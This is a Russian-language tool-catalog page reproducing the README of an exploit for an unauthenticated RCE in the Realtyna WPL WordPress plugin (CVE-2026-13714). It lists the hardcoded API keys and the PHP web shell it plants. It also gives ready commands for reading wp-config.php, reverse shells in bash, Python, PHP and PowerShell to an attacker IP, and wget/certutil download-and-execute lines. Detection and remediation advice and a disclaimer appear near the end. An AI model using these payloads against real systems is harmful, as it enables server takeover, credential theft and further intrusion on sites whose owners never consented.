Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-13714 — Эксплойт неаутентифицированного RCE для Realtyna WPL < 5.3.0, который загружает PHP-веб-шелл через зашитый API-ключ и выполняет произвольные системные команды. | Kitploit
Инструменты/GitHubGitHub/katransefa/cve-2026-13714
ЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Эксплойт неаутентифицированного RCE для Realtyna WPL < 5.3.0, который загружает PHP-веб-шелл через зашитый API-ключ и выполняет произвольные системные команды.

Репозиторий
3 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Realtyna WPL < 5.3.0 — Эксплойт неавторизованного RCE

Описание

Этот эксплойт нацелен на критическую уязвимость в плагине Realtyna Organic IDX + WPL Real Estate версий ниже 5.3.0. Плагин использует жёстко заданные учётные данные и позволяет неавторизованную загрузку файлов, что приводит к удалённому выполнению кода (RCE).

Сведения об уязвимости

  • CVE ID: CVE-2026-13714
  • Затронутые версии: < 5.3.0
  • Тип: неавторизованная произвольная загрузка файлов с последующим RCE
  • Исследователь: Thom Stackhouse

Технические подробности

Плагин имеет API ввода-вывода, включённый по умолчанию, с жёстко заданными учётными данными:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

API не проверяет типы файлов, что позволяет загружать произвольные PHP-файлы.

Установка

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

Использование

Базовое использование

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

Часто используемые команды

Цели Linux

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Цели Windows

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

Расширенное использование

Реверс-шелл (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Реверс-шелл (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Загрузка и выполнение собственных пейлоадов

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

Порядок работы эксплойта

  1. Загрузка: загружает PHP-веб-шелл (<?php system($_GET['c']); ?>)
  2. Расположение: файл сохраняется в wp-content/uploads/WPL/<ID>/shell.php
  3. Выполнение: выполнение команд через shell.php?c=COMMAND

Обнаружение

Как обнаружить эксплойт

  • Проверяйте наличие подозрительных файлов в /wp-content/uploads/WPL/*/
  • Отслеживайте запросы с параметрами: wplview=io, wplformat=io, cmd=set_property
  • Ищите подозрительные API-запросы с жёстко заданными учётными данными

Признаки компрометации

  • Неожиданные PHP-файлы в каталогах загрузок
  • Необычные веб-запросы с системными командами
  • Новые пользователи с правами администратора в WordPress
  • Изменённые файлы .htaccess

Устранение уязвимости

Исправления

  1. Немедленно обновитесь до версии WPL Real Estate 5.3.0 или выше
  2. Если обновление невозможно, отключите API ввода-вывода:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. Измените жёстко заданные учётные данные
  4. Внедрите надлежащую проверку типов файлов
  5. Ограничьте каталоги загрузки файлов

Рекомендации по безопасности

  • Поддерживайте все плагины WordPress в актуальном состоянии
  • Используйте межсетевой экран для веб-приложений (WAF)
  • Регулярно проводите аудит безопасности
  • Отслеживайте каталоги загрузки файлов
  • Отключайте неиспользуемые API

Скриншоты

Успешный эксплойт

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

Отказ от ответственности

Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.

Правомерное использование

  • Используйте только на системах, которыми вы владеете
  • Используйте только с явного письменного разрешения
  • Следуйте практике ответственного раскрытия уязвимостей
  • Сообщайте об уязвимостях поставщикам

Лицензия

Этот проект предназначен только для образовательных целей. Используйте на свой страх и риск.

Авторы

  • Первоначальный исследователь: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

Ссылки

  • Страница уязвимости WPScan
  • CVE-2026-13714

Журнал изменений

v1.0 (2026-08-17)

  • Первоначальный выпуск
  • Неавторизованная загрузка файлов
  • Удалённое выполнение кода
  • Поддержка выполнения команд

Вклад в проект

Не стесняйтесь отправлять issue и pull request для улучшений.

Поддержка

По вопросам и проблемам, пожалуйста, откройте issue на GitHub.


⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предоставляется только для исследований в области безопасности и образовательных целей. Всегда получайте надлежащее разрешение перед тестированием любой системы.

Скачать инструмент